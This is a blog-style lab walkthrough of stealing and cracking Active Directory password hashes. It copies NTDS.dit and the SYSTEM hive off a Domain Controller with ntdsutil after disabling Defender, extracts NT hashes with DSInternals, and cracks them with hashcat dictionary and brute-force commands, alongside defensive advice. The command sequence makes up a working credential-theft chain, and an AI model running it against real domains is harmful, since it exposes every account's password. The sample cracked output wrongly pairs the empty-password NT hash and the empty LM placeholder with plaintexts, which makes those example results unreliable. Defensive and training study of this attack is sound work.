Introduction
Understanding how Active Directory password hashes can be extracted and cracked is essential knowledge for any security engineer or penetration tester. This post walks through the exact steps I used in my lab environment to extract the NTDS.dit database from a Domain Controller, convert the hashes into a format Hashcat can use, and run a cracking session on a Windows machine
This is not a guide for attacking real environments. It is a practical lab exercise to understand the attack chain — so you know what to defend against.
⚠ Disclaimer: Only perform these steps on systems you own or have explicit written permission to test. Extracting and cracking credentials from systems without authorization is illegal under the Computer Crime Act (Wet Computercriminaliteit) and equivalent laws in most jurisdictions. This post is intended for authorized penetration testing and lab use only.
Why This Matters
NTLM is a dangerously fast hashing algorithm. A single Gaming GPU like a RTX 3090 I own myself can test over 22 million NTLM hashes per second. That means an entire rockyou.txt wordlist (14 million passwords) is exhausted in roughly one second. If your organization still relies on NTLM and weak passwords, a compromised DC means every account password is at risk.
The takeaway for defenders: enforce long passphrases (14+ characters), disable NTLM where possible, and use Kerberos with AES encryption. For service Accounts always use gMSA accounts.
Lab Setup
| Component | Details |
|---|---|
| Domain Controller OS | Windows Server (dev VM) |
| Hashcat machine OS | Windows 11 |
| GPU | NVIDIA GeForce RTX 3090 (24 GB) |
| Hashcat version | 7.1.2 |
| Hash mode | 1000 (NTLM) |
| Wordlist | rockyou.txt (14.3M passwords) |
Phase 1 – Extract NTDS.dit from the Domain Controller
The NTDS.dit file is locked by the OS while the DC is running, so you cannot copy it directly. The cleanest way is to use ntdsutil, which creates a clean offline copy including the SYSTEM hive needed to decrypt the hashes.
Note: Disable Defender on your Domain Controller, AV Bypass is a different blog post
First, create an output folder:
mkdir C:\Temp\dumpThen extract using ntdsutil:
ntdsutil "ac i ntds" "ifm" "create full C:\Temp\dump" q qAfter it completes, verify both files are present:
C:\Temp\dump\Active Directory\ntds.dit
C:\Temp\dump\registry\SYSTEMTransfer the entire C:\Temp\dump folder to your Hashcat machine.
Phase 2 – Extract NT Hashes with DSInternals
On the Hashcat machine, use the DSInternals PowerShell module to extract the NT hashes directly into Hashcat format.
Install the module:
Install-Module DSInternals -ForceIf you get an execution policy error:
Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUserImport the module
Import-Module DSInternalscd C:\Temp\dumpExtract hashes:
$key = Get-BootKey -SystemHivePath .\registry\SYSTEM
Get-ADDBAccount -All -DBPath ".\Active Directory\ntds.dit" -BootKey $key |
Where-Object { $_.NTHash -ne $null } |
ForEach-Object {
[System.BitConverter]::ToString($_.NTHash).Replace("-","").ToLower()
} | Set-Content nt_hashes.txt -Encoding ASCIIVerify the output looks correct (32-character hex strings, one per line):
Get-Content nt_hashes.txt | Select-Object -First 5
# Expected output:
31d6cfe0d16ae931b73c59d7e0c089c0
aad3b435b51404eeaad3b435b51404ee
8846f7eaee8fb117ad06bdd830b7586cPhase 3 – Crack with Hashcat
Download hashcat https://hashcat.net/hashcat/ and extract to this folder C:\Tools
Download the Rockyou.txt as example https://weakpass.com/wordlists/rockyou.txt
Navigate to your Hashcat folder and run a dictionary attack using mode 1000 (NTLM):
cd C:\tools\hashcat-7.1.2
.\hashcat.exe -m 1000 C:\Temp\dump\nt_hashes.txt C:\Temp\dump\rockyou.txtOnce the session finishes, view cracked results:
.\hashcat.exe -m 1000 C:\Temp\dump\nt_hashes.txt --show
# Output format: hash:plaintext
31d6cfe0d16ae931b73c59d7e0c089c0:Password123
aad3b435b51404eeaad3b435b51404ee:Welcome1If you know roughly what passwords you set in your dev environment and you have the time, you can also try a brute force attack:
# All characters up to 8 chars
.\hashcat.exe -m 1000 C:\tools\dump\nt_hashes.txt -a 3 ?a?a?a?a?a?a?a?a -O
# If passwords are simple (lowercase + numbers)
.\hashcat.exe -m 1000 C:\tools\dump\nt_hashes.txt -a 3 ?l?l?l?l?l?l?l?l -OConclusion
NTLM hashes extracted from a Domain Controller can be cracked at extraordinary speed on commodity hardware. This lab exercise demonstrates why NTLM is considered a weak credential storage mechanism and why organizations should enforce long, complex passphrases, restrict NTLM authentication, and monitor for NTDS extraction attempts using tools like Microsoft Defender for Identity.
If you want to detect this kind of activity in your environment, check out my post on setting up Microsoft Defender for Identity.
Ontdek meer van Rockit One
Abonneer je om de nieuwste berichten naar je e-mail te laten verzenden.